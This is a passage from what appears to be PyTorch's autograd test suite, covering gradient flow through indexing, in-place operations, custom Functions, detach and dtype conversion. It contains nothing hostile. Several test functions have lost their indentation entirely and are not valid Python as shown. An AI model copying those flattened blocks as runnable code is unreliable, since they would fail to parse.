    y[idx].sum().backward()
    expected_grad = torch.zeros(4, 4)
    for i in idx:
        expected_grad[i] += 1
    self.assertEqual(y.grad, expected_grad)

    # with advanced indexing
    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)

    idx = [[1, 1, 3, 2, 1, 2], [0]]
    y[idx].sum().backward()
    expected_grad = torch.zeros(4, 4)
    for i in idx[0]:
        for j in idx[1]:
            expected_grad[i][j] += 1

    self.assertEqual(y.grad, expected_grad)

    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)
    idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
    y[idx].sum().backward()
    # positions (1,0), (2,1), (0,1) x2 receive gradient
    expected_grad = torch.tensor([[0., 2., 0., 0.],
                                  [1., 0., 0., 0.],
                                  [0., 1., 0., 0.],
                                  [0., 0., 0., 0.]])
    self.assertEqual(y.grad, expected_grad)

    x = torch.arange(1., 65).view(4, 4, 4)
    y = Variable(x, requires_grad=True)

    idx = [[1, 1, 1], slice(None), slice(None)]
    y[idx].sum().backward()
    expected_grad = torch.empty(4, 4, 4).zero_()
    # row 1 selected three times -> grad 3 everywhere in that slice
    expected_grad[1].fill_(3)
    self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
    """index() must not save the indexed tensor for backward."""
    # Example from https://github.com/pytorch/pytorch/issues/24853.
    # if `index(tensor, indices)` saves `tensor` for backwards, then it will
    # trigger a version check on `tensor` during the backward pass, which
    # will cause the following code to error because `tensor` gets modified
    # by the indexing line.
    a = torch.tensor([1., 0, 0])
    b = torch.zeros(3, requires_grad=True)
    tensor = b + 0
    tensor[a != 0] = tensor[a != 0]
    tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
    """Reading the removed .volatile attribute warns and returns False."""
    # NOTE(review): `torch.autograd.torch` appears to resolve to the torch
    # module re-exported through torch.autograd — presumably plain
    # torch.randn; confirm there is no intent behind the long path.
    v = torch.autograd.torch.randn(3, 3)
    with warnings.catch_warnings(record=True) as w:
        self.assertFalse(v.volatile)
    self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_variables
return (grad_output, grad_output)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
x = torch.randn((3, 3), requires_grad=True)
y = torch.randn((3, 3), requires_grad=True)
MyFunction.apply(x, y).sum().backward()
has_deprecated = map(lambda warn:
'deprecated' in str(warn) and
'saved_variables' in str(warn),
warns)
has_deprecated = reduce(lambda x, y: x or y, has_deprecated)
self.assertTrue(has_deprecated)
def test_requires_grad(self):
    """requires_grad propagates through ops; backward never visits
    subgraphs whose tensors do not require grad."""
    x = torch.randn(5, 5)
    y = torch.randn(5, 5)
    z = torch.randn(5, 5, requires_grad=True)
    a = x + y
    self.assertFalse(a.requires_grad)
    b = a + z
    self.assertTrue(b.requires_grad)

    def error():
        raise RuntimeError
    # Make sure backward isn't called on these
    a._backward_hooks = OrderedDict()
    x._backward_hooks = OrderedDict()
    y._backward_hooks = OrderedDict()
    a._backward_hooks['test'] = error
    x._backward_hooks['test'] = error
    y._backward_hooks['test'] = error
    # if backward touched a/x/y, the error hooks above would raise
    b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
    """requires_grad_() returns self, toggles the flag on leaves, and
    rejects disabling grad on non-leaf tensors."""
    x = torch.randn(5, 5)
    y = torch.randn(5, 5, requires_grad=True)
    self.assertIs(x, x.requires_grad_())
    self.assertTrue(x.requires_grad)
    self.assertIs(y, y.requires_grad_())
    self.assertTrue(y.requires_grad)
    self.assertIs(x, x.requires_grad_(True))
    self.assertTrue(x.requires_grad)
    self.assertIs(y, y.requires_grad_(True))
    self.assertTrue(y.requires_grad)
    z = x * y
    # a non-leaf cannot have requires_grad turned off
    self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
    self.assertIs(z, z.requires_grad_())
    self.assertTrue(z.requires_grad)
    self.assertIs(z, z.requires_grad_(True))
    self.assertTrue(z.requires_grad)

    self.assertIs(x, x.requires_grad_(False))
    self.assertFalse(x.requires_grad)
    self.assertIs(y, y.requires_grad_(False))
    self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
    """An in-place op with a grad-requiring argument makes the target
    require grad, for leaves and non-leaves alike."""
    a = torch.randn(5, 5)
    b = torch.randn(5, 5, requires_grad=True)
    a += b
    self.assertTrue(a.requires_grad)

    # non-leaf
    a = torch.randn(5, 5) + 0
    b = torch.randn(5, 5, requires_grad=True)
    a += b
    self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
    """In-place modification is fine before requires_grad is set, but
    forbidden on (views of) a leaf once it requires grad."""
    # basic case, should be able to modify inplace while requires_grad is False
    a = torch.randn(2, 3)
    a.add_(5)
    a.requires_grad = True
    a.sum().backward()
    self.assertEqual(a.grad, torch.ones(2, 3))

    # same but with a view
    a = torch.randn(2, 3)
    b = a[:]
    b.add_(5)
    a.requires_grad = True
    a.sum().backward()
    self.assertEqual(a.grad, torch.ones(2, 3))

    # should fail if requires_grad = True when we modify inplace
    a = torch.randn(2, 3)
    b = a[:]
    a.requires_grad = True
    with self.assertRaises(RuntimeError):
        a.add_(5)
    with self.assertRaises(RuntimeError):
        b.add_(5)
def test_attribute_deletion(self):
    """Only .grad may be deleted from a tensor; the other autograd
    attributes reject deletion (and .data rejects None assignment)."""
    x = torch.randn((5, 5), requires_grad=True)
    # deleting grad is allowed and resets it to None
    del x.grad
    self.assertIsNone(x.grad)
    with self.assertRaises(RuntimeError):
        del x.data
    with self.assertRaises(TypeError):
        x.data = None
    with self.assertRaises(RuntimeError):
        del x.requires_grad
    with self.assertRaises(RuntimeError):
        del x._grad_fn
    with self.assertRaises(RuntimeError):
        del x._backward_hooks
def test_duplicate_backward_root(self):
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
    """backward(create_graph=True) warns; grad(create_graph=True) does not."""
    try:
        prev = torch.is_warn_always_enabled()
        # force warnings to fire even if already emitted once
        torch.set_warn_always(True)

        b = torch.randn(3, requires_grad=True, dtype=torch.double)
        c = b * b
        with warnings.catch_warnings(record=True) as ws:
            c.backward(torch.ones_like(c), create_graph=True)
        b.grad = None
        self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))

        # Should not warn for grad
        with warnings.catch_warnings(record=True) as ws:
            torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
        self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
    finally:
        # restore the global warn-always setting
        torch.set_warn_always(prev)
def test_next_functions(self):
    """grad_fn.next_functions exposes AccumulateGrad nodes for leaves and
    None for inputs that do not require grad."""
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=True)

    a = x + y
    self.assertIsNotNone(a.grad_fn)
    next_functions = a.grad_fn.next_functions
    self.assertEqual(len(next_functions), 2)
    self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
    self.assertEqual(next_functions[0][1], 0)
    self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
    self.assertEqual(next_functions[1][1], 0)

    b = a + 5
    next_functions = b.grad_fn.next_functions
    self.assertEqual(len(next_functions), 2)
    self.assertIs(next_functions[0][0], a.grad_fn)
    # the scalar 5 has no grad_fn, hence None
    self.assertIs(next_functions[1][0], None)
def test_inplace(self):
    """Version-counter checks: in-place ops invalidate tensors saved for
    backward; ops that saved nothing still work."""
    x = torch.ones(5, 5, requires_grad=True)
    y = Variable(torch.ones(5, 5) * 4, requires_grad=True)

    z = x * y
    q = z + y
    w = z * y
    z.add_(2)
    # Add doesn't need its inputs to do backward, so it shouldn't raise
    q.backward(torch.ones(5, 5), retain_graph=True)
    # Mul saves both inputs in forward, so it should raise
    self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))

    z = x * y
    q = z * y
    r = z + y
    w = z.add_(y)
    # w is the last expression, so this should succeed
    w.backward(torch.ones(5, 5), retain_graph=True)
    # r doesn't use the modified value in backward, so it should succeed
    r.backward(torch.ones(5, 5), retain_graph=True)
    # q uses dirty z, so it should raise
    self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))

    with torch.no_grad():
        x.grad.zero_()
    m = x / 2
    z = m + y / 8
    q = z * y
    r = z + y
    # in-place exp_ bumps z's version counter
    prev_version = z._version
    w = z.exp_()
    self.assertNotEqual(z._version, prev_version)
    r.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(x.grad, torch.ones(5, 5) / 2)
    w.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
    self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))

    leaf = torch.ones(5, 5, requires_grad=True)
    x = leaf.clone()
    x.add_(10)
    self.assertEqual(x, torch.ones(5, 5) * 11)
    # x should be still usable
    y = x + 2
    y.backward(torch.ones(5, 5))
    self.assertEqual(leaf.grad, torch.ones(5, 5))
    z = x * y
    x.add_(2)
    self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
    """Marking one of several outputs non-differentiable leaves the others differentiable."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, input):
            a = input + 1
            b = input + 2
            ctx.mark_non_differentiable(a)
            return a, b

        @staticmethod
        def backward(ctx, grad_a, grad_b):
            # The non-differentiable output receives a zero gradient.
            self.assertTrue((grad_a == 0).all())
            self.assertTrue((grad_b == 1).all())
            return grad_b

    x = torch.randn(5, 5, requires_grad=True)
    a, b = MyFunction.apply(x)
    self.assertFalse(a.requires_grad)
    self.assertTrue(b.requires_grad)
    b.sum().backward()
    self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
    # This used to segfault because MyFunction would send back null
    # gradients to MulBackward, which is implemented in C++. C++
    # implemented functions expect incoming grad_outputs to be non-null.
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, input):
            output = input.clone()
            ctx.mark_non_differentiable(output)
            return output

        @staticmethod
        def backward(ctx, grad_output):
            return None

    x = torch.randn(5, 5, requires_grad=True)
    r = MyFunction.apply(x * x)
    (r * x).sum().backward()
def test_return_duplicate(self):
    """A Function returning the same tensor twice yields aliased outputs; grads from both sum."""
    class DoubleDuplicate(Function):
        @staticmethod
        def forward(ctx, x):
            output = x * 2
            return output, output

        @staticmethod
        def backward(ctx, grad1, grad2):
            return grad1 * 2 + grad2 * 2

    def fn(x):
        a, b = DoubleDuplicate.apply(x)
        self.assertIs(a, b)
        return a + b

    x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
    gradcheck(fn, [x])
    gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
class DoubleInplace(Function):
@staticmethod
def forward(ctx, x):
x.mul_(2)
ctx.mark_dirty(x)
return x, x
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def inplace_fn(x):
a, b = DoubleInplace.apply(x.clone())
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(inplace_fn, [x])
gradgradcheck(inplace_fn, [x])
# Can't modify leaf variables in-place
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x))
# Functions which modify views in-place must return only one output
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0]))
@suppress_warnings
def test_resize(self):
    """Deprecated Tensor.resize returns a tensor with the requested shape."""
    x = torch.ones(2, 3)
    self.assertTrue(x.resize(3, 2).size() == (3, 2))
def _test_setitem(self, size, index):
    """Helper: constant assignment at `index` bumps the version counter and
    zeroes the incoming gradient at the overwritten positions."""
    source = torch.ones(*size, requires_grad=True)
    result = source + 2
    version_before = result._version
    result[index] = 2
    self.assertNotEqual(result._version, version_before)
    result.backward(torch.ones(*size))
    grad_expected = torch.ones(*size)
    grad_expected[index] = 0
    self.assertEqual(source.grad, grad_expected)
def _test_setitem_tensor(self, size, index):
    """Helper: assigning a grad-requiring tensor at `index` routes grads to both
    the overwritten base (zeroed at `index`) and the assigned value (ones)."""
    x = torch.ones(*size, requires_grad=True)
    y = x + 2
    y_version = y._version
    value = x.new(x[index].size()).fill_(7)
    value.requires_grad = True
    y[index] = value
    self.assertNotEqual(y._version, y_version)
    y.backward(torch.ones(*size))
    expected_grad_input = torch.ones(*size)
    expected_grad_input[index] = 0
    self.assertEqual(x.grad, expected_grad_input)
    self.assertEqual(value.grad, torch.ones_like(value))
    # case when x broadcasts into y[1]
    x = torch.randn(4, requires_grad=True)
    y = torch.zeros(2, 3, 4)
    y[1] = x
    y.backward(torch.randn(2, 3, 4))
    self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
    """Exercise indexed assignment with int, advanced-list, slice and tensor indices."""
    self._test_setitem((5, 5), 1)
    self._test_setitem((5,), 1)
    self._test_setitem((1,), 0)
    self._test_setitem((10,), [[0, 4, 2]])
    self._test_setitem((5, 5), [[0, 4], [2, 2]])
    self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
    self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
    self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
    self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
    self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
    self._test_setitem_tensor((5, 5), 3)
    self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
    self._test_setitem_tensor((5,), 3)
    self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
    self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
    self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
    self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
    self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
    self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
    self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
    self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
                              3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
    """Indexed assignment through a boolean mask."""
    mask = torch.BoolTensor(5, 5).bernoulli_()
    self._test_setitem((5, 5), Variable(mask))
    self._test_setitem((5,), Variable(mask[0]))
    self._test_setitem((1,), Variable(mask[0, 0:1]))
    self._test_setitem_tensor((5, 5), Variable(mask))
    self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
    """autograd.grad accepts an expanded (stride-0) grad_output for diagonal()."""
    value = torch.rand([])
    v_expanded = torch.tensor(value).expand(10)
    a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
    result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
    self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
# TODO: opinfo this or move to unbind's test suite
def test_unbind(self):
    """unbind() backward stitches the per-slice grads back into the stacked input."""
    stacked = torch.randn(3, 10, 10, requires_grad=True)
    x, y, z = stacked.unbind()
    grad = torch.randn(3, 10, 10)
    torch.autograd.backward([x, y, z], grad.unbind())
    self.assertEqual(stacked.grad, grad)
    # check that it works with only one gradient provided (#9977)
    for i in range(3):
        stacked = torch.randn(3, 10, 10, requires_grad=True)
        outs = stacked.unbind()
        gi = grad.unbind()[i]
        g, = torch.autograd.grad(outs[i], stacked, gi)
        g_expected = torch.stack([gi if j == i else torch.zeros_like(gi)
                                  for j in range(3)], dim=0)
        self.assertEqual(g, g_expected)
# TODO: opinfo this or move to fill's test suite
def test_fill(self):
root = torch.randn(4, 5, requires_grad=True)
def func(root):
x = root.clone()
x.fill_(2)
return x
gradcheck(func, [root])
gradgradcheck(func, [root])
def test_unused_output(self):
    """Backward through one chunk of a multi-output op leaves the other chunks' grads zero."""
    x = torch.randn(10, 10, requires_grad=True)
    outputs = x.chunk(5)
    o = outputs[2]
    o = o * 4 + 2
    o.sum().backward()
    expected_grad = torch.zeros(10, 10)
    # chunk 2 covers rows 4:6 of the 10-row input
    expected_grad[4:6] = 4
    self.assertEqual(x.grad, expected_grad)
    with torch.no_grad():
        x.grad.zero_()
    grad_output = torch.randn(2, 10)
    outputs = x.chunk(5)
    outputs[0].backward(grad_output)
    expected_grad = torch.zeros(10, 10)
    expected_grad[:2] = grad_output
    self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
    """Helper: gather with sparse_grad=True must match the dense gradient."""
    x = torch.randn(size_x, requires_grad=True)
    if len(size_ind) > 0 and len(size_x) > 0:
        ind = torch.randint(x.size(dim), size_ind)
    else:
        # scalar corner cases: no valid dim to sample indices from
        ind = torch.zeros(size_ind, dtype=torch.int64)
    out = torch.gather(x, dim, ind, sparse_grad=False)
    grad = torch.rand_like(out)
    out.backward(grad)
    grad_dense = x.grad.clone()
    x.grad = None
    out = torch.gather(x, dim, ind, sparse_grad=True)
    out.backward(grad)
    self.assertEqual(grad_dense, x.grad.to_dense())
# Thin wrappers driving _test_sparse_gather over dims and scalar corner cases.
def test_sparse_gather_dim0(self):
    self._test_sparse_gather((10, 10), (5, 10), 0)

def test_sparse_gather_dim1(self):
    self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)

def test_sparse_gather_dim_neg(self):
    self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)

def test_sparse_gather_ind_scalar(self):
    self._test_sparse_gather((10,), (), 0)

def test_sparse_gather_x_scalar(self):
    self._test_sparse_gather((), (2,), 0)

def test_sparse_gather_both_scalar(self):
    self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
    """
    Previously, if a Function destructor triggered a garbage collection,
    the Variable's tp_dealloc handler would get called twice leading to a
    segfault.
    """
    class CollectOnDelete(Function):
        # NOTE: deliberately uses the deprecated non-static forward/backward
        # style; the point of the test is the __del__ -> gc interaction.
        def forward(self, x):
            return x

        def backward(self, grad_output):
            return grad_output

        def __del__(self):
            gc.collect()

    for _ in range(10):
        CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
    """Accessing Node-only attributes on a bare Function instance must error, not segfault."""
    class Id(Function):
        @staticmethod
        def forward(ctx, x):
            return x

        @staticmethod
        def backward(ctx, grad_x):
            return grad_x

    with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
        f = Id()
    # After raising warning, should still return an instance
    self.assertIsInstance(f, Id)
    x = torch.zeros(1, requires_grad=True)
    with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
        f(x)
    t = Id.apply(x)
    self.assertEqual(t.grad_fn.name(), "IdBackward")
    # THPFunction is the base class of both grad_fn and autograd functions,
    # which means that a lot of accessors on them may segfault. Test that we
    # properly error in this case.
    t = torch.ones(1, requires_grad=True)
    t._backward_hooks = dict()
    with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
        f._register_hook_dict(t)
    with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
        f.register_hook(lambda x, y: None)
    with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
        f.next_functions
    with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
        f.name()
    with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
        f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
    """Known failure: grad_fn.metadata breaks once the output tensor is deleted."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, x):
            return x

        @staticmethod
        def backward(ctx, g):
            return g

    x = torch.zeros(1, requires_grad=True)
    y = MyFunction.apply(x)
    y.backward()
    y.grad_fn.metadata
    g = y.grad_fn
    del y
    g.metadata  # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
    """A ctx stashed past backward must not keep saved tensors alive after graph free."""
    saved_ctx = []

    class Id(Function):
        @staticmethod
        def forward(ctx, x):
            ctx.save_for_backward(x)
            return x

        @staticmethod
        def backward(ctx, grad_x):
            saved_ctx.append(ctx)
            return ctx.saved_tensors

    p = torch.zeros(1, requires_grad=True)
    loss = Id.apply(p)
    loss.backward(retain_graph=True)
    del loss
    # At this point in time, it complains that the graph has been freed
    # (which is indeed true, although a somewhat indirect way of stating the
    # problem).
    self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
    # This test failed the equality check in PR #22983; it's an interesting
    # and different test case worth enshrining. mult1 is not testing
    # anything that interesting, but mult2 is the interesting case.
    def mult1(x):
        return x.prod(dim=-1).prod(dim=-1)

    class Mult(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            y = mult1(x)
            ctx.save_for_backward(x, y)
            return y

        @staticmethod
        def backward(ctx, grad_output):
            x, y = ctx.saved_tensors
            return (grad_output * y)[:, None, None] / x

    mult2 = Mult.apply

    def check_gradgrad_repeated(x, y):
        # Taking grad-of-grad twice through the same graph must be stable.
        gy, = torch.autograd.grad(y[0], x, create_graph=True)
        ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
        gy, = torch.autograd.grad(y[0], x, create_graph=True)
        ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
        self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])

    x = torch.ones(2, 4, 4).requires_grad_()
    check_gradgrad_repeated(x, mult1(x))
    check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
    # This test failed complaining that buffers had already been freed
    # prior to #22983. Also pretty interesting test case.
    class Double(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            y = x ** 2
            ctx.save_for_backward(x, y)
            return y

        @staticmethod
        def backward(ctx, grad_output):
            x, _ = ctx.saved_tensors
            return grad_output * 2 * x

    # this is equivalent, but uses the output of .forward() in .backward()
    class Double2(Double):
        @staticmethod
        def backward(ctx, grad_output):
            x, y = ctx.saved_tensors
            return grad_output * 2 * y / x

    double = Double.apply
    double2 = Double2.apply
    x = torch.tensor(2).double().requires_grad_()
    self.assertTrue(gradcheck(double, x))
    self.assertTrue(gradgradcheck(double, x))
    self.assertTrue(gradcheck(double2, x))
    self.assertTrue(gradgradcheck(double2, x))
    y = double(x)
    torch.autograd.grad(y, x, create_graph=True)
    torch.autograd.grad(y, x)
    y = double2(x)
    torch.autograd.grad(y, x, create_graph=True)
    torch.autograd.grad(y, x)  # should not error!
def test_detach(self):
    """detach()/detach_() cut the tensor out of the autograd graph."""
    x = torch.randn(10, 10, requires_grad=True)
    y = x + 2
    y = y.detach()
    z = y * 4 + 2
    self.assertFalse(y.requires_grad)
    self.assertFalse(z.requires_grad)
    x = torch.randn(10, 10, requires_grad=True)
    y = x * 2
    y = y.detach()
    self.assertFalse(y.requires_grad)
    self.assertIsNone(y.grad_fn)
    z = x + y
    z.sum().backward()
    # This is an incorrect gradient, but we assume that's what the user
    # wanted. detach() is an advanced option.
    self.assertEqual(x.grad, torch.ones(10, 10))
    # in-place detach
    x = torch.randn(10, 10, requires_grad=True)
    y = torch.randn(10, 10, requires_grad=True)
    a = x * 2
    (y + a).sum().backward(retain_graph=True)
    a.detach_()
    self.assertFalse(a.requires_grad)
    (y + a).sum().backward()  # this won't backprop to x
    self.assertEqual(x.grad, torch.ones(10, 10) * 2)
    self.assertEqual(y.grad, torch.ones(10, 10) * 2)
    # in-place detach on a view raises an exception
    view = x.narrow(0, 1, 4)
    self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def _test_type_conversion_backward(self, t):
    """Helper: backward through float<->double conversion yields grads of the source type.

    `t` wraps the input tensor (e.g. identity, or a move to CUDA).
    """
    float_var = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
    float_var.double().sum().backward()
    self.assertEqual(float_var.grad, torch.ones_like(float_var))
    self.assertEqual(type(float_var.grad), type(float_var))
    double_var = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
    double_var.float().sum().backward()
    self.assertEqual(double_var.grad, torch.ones_like(double_var))
    self.assertEqual(type(double_var.grad), type(double_var))
def test_type_conversions(self):
    """dtype/device conversion methods return the expected Tensor classes (CPU and CUDA)."""
    x = torch.randn(5, 5)
    self.assertIsInstance(x.float(), torch.FloatTensor)
    self.assertIsInstance(x.int(), torch.IntTensor)
    if torch.cuda.is_available():
        self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
        self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
        self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
        if torch.cuda.device_count() >= 2:
            x2 = x.float().cuda(1)
            self.assertIsInstance(x2, torch.cuda.FloatTensor)
            self.assertIs(x2.get_device(), 1)
            x2 = x.float().cuda()
            self.assertIsInstance(x2, torch.cuda.FloatTensor)
            self.assertIs(x2.get_device(), 0)
            x2 = x2.cuda(1)
            self.assertIsInstance(x2, torch.cuda.FloatTensor)
            self.assertIs(x2.get_device(), 1)
            y = Variable(torch.randn(5).cuda(1), requires_grad=True)
            y.cpu().sum().backward()
            self.assertIs(y.grad.get_device(), 1)
            self.assertIs(y.long().get_device(), 1)
    for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
        for y_var in (True, False):
            y = torch.randint(5, (5, 5), dtype=t.dtype)
            y = Variable(y) if y_var else y
            self.assertIsInstance(x.type(t), t)
            self.assertIsInstance(x.type_as(y), t)
            # TODO: t.dtype should work
            t_dtype = t().dtype
            self.assertIsInstance(x.type(t_dtype), t)
            self.assertIs(t_dtype, x.type(t_dtype).dtype)
            # same-type conversion must be a no-op sharing storage
            self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
            if torch.cuda.is_available():
                for x_cuda in (True, False):
                    for y_cuda in (True, False):
                        x_c = x.cuda() if x_cuda else x
                        y_c = y.cuda() if y_cuda else y
                        _, y_type = y_c.type().rsplit('.', 1)
                        y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
                        self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
                        self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
                        self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
    self._test_type_conversion_backward(lambda x: x)
    if torch.cuda.is_available():
        self._test_type_conversion_backward(lambda x: x.cuda())
        if torch.cuda.device_count() >= 2:
            # one of these has to be the non-default device
